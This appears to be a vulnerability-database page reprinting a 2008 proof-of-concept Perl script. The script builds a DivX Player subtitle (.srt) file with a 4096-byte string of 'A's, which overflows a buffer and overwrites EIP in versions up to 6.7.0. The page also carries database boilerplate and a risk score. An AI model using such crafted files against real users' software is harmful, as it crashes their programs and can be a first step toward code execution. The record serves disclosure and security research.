Lucene search
K

DivX Player <= 6.7.0 SRT File Buffer Overflow PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 12 Views

DivX Player SRT File Buffer Overflow Po

Code

                                                # DIVX Player &#60;= 6.7.0 Buffer Overflow PoC (  .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash  with eip overwritted:
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl                                        
my $file=&#34;MOVIE_FILENAME.srt&#34;;                           
                                                             
my $payload = &#34;A&#34; x 4096;                                    
                                                             
open( $file, &#34;&#62;&#62;$file&#34;) or die &#34;Cannot open $file: $!&#34;;      
   
print $file &#34;1 \n&#34;;
print $file &#34;00:00:01,001 --&#62; 00:00:02,001\n&#34;;
print $file $payload;                              
                                                             
close($file);                                                
                                                             
print &#34;$file has been created \n&#34;;    

# milw0rm.com [2008-04-15]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
12